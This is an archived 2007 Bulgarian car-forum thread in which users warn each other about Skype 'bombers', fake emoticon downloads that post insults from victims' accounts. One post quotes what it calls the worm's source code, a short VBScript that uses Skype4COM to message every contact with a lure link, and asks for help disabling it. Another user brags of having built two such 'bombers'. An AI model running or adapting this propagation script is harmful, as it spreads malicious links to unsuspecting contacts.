Пазете се от скайпе бомбери!

Взаимопомощ, полезна информация и всичко, извън темата на останалите секции
Потребителски аватар
deluX
Автомобил:
Двигател:
Контакти:

Мнениеот deluX » Пет 01 юни 2007 19:43

Такова нещо като "не приемай абонатът оси вирус" НЯМА !!!!! неможе този абонат да има достъп до компа ви и да ви слага файлове единствено може да хванете вирус по скайпа ако получите ЗАРАЗЕН ФАЙЛ такаче не приемайте от случайни хора

Ако дадете само пълномощно няма нищо да ви стане на компа..

А и тия Smiles дори да влезнете в сайта и да ги свалите (както направих аз :oops: ) неможе пак нищо да ви направи освен ако сте го разархивирали файла тогава може да хванете нещо !!!! :arrow: :!: :!: :!:

Потребителски аватар
Memo
Автомобил:
Двигател:
Контакти:

Мнениеот Memo » Пет 01 юни 2007 21:02

baTkoTo написа:
G3 написа:
baTkoTo написа:G3
това е другата функция на тия бомберчета!!!
за това ви казвам да внимавате и да не ги отваряте и аз имам два направени бомбера и ако искаш да видиш мойте са безобидни дай си скайпе да ти покажа какво става :)

да днес убеждавам един приятел да ми даде едно нещо и тъкмо го убедих и от мое име ссе изписа "че ти еба маменцето" няма да казвам как во стана.......

да бате като го отвориш и почва да псува от твое име за това ти казвам на мен ми пратиха и като го отворих ми изписа че съм с обратни наклоности та гледай как обяснявам че не е вярно и че това ми го пратиха и им доказвах как ми се смяха просто не е реално

:D :D :D Колега, как се смях на тва не е истина, просто си представих ситуацията и ме налегна страшен смяк, ще извиняваш :D

Потребителски аватар
Vizor
Изгубена душа
Автомобил: Subaru Forester XT
Двигател:
Контакти:

Мнениеот Vizor » Нед 03 юни 2007 20:03

Код: Избери всички

on error resume next

set yADAl = WScript.CreateObject("Skype4COM.Skype", "Skype_")
yADAl.Client.Start()

For Each GAG In yADAl.Friends
yADAl.SendMessage GAG.handle,"Novi emotikoni za skype ;P -> http://skype-emotikoni.hit.bg"
next
msgbox "by FmX"

това е сорс кода на вируса..давайте идей как да направим един скрипт да го деактивира

до колкото си го обяснявам прави файл Skype4COM.dll i Skype_.dll ?
значи който е заразен трябва да ги има тези файлове

pacohaker
Автомобил:
Двигател:

Мнениеот pacohaker » Нед 03 юни 2007 20:51

Ай стига ве таман вчера преинсталирах заради троянски кон,сега и туй ако лепна направо незнам,дано някой хакер го спре това

Потребителски аватар
mr_bush
Автомобил: Vw Transporter T6
Двигател: 2016

Мнениеот mr_bush » Нед 03 юни 2007 23:27

Малее сутринта едно момиче ми пише [03.6.2007 г. 12:05:32] AnItuUuU каза: Az sym typ grozen ped.r.st(Mrasen Dunavec!!!)I hate DUNAV1!! И аз шах :shock ама сега вече разбрах каде е ключа за бараката :P :wink:

Върни се в “ОФФ-Топик - други”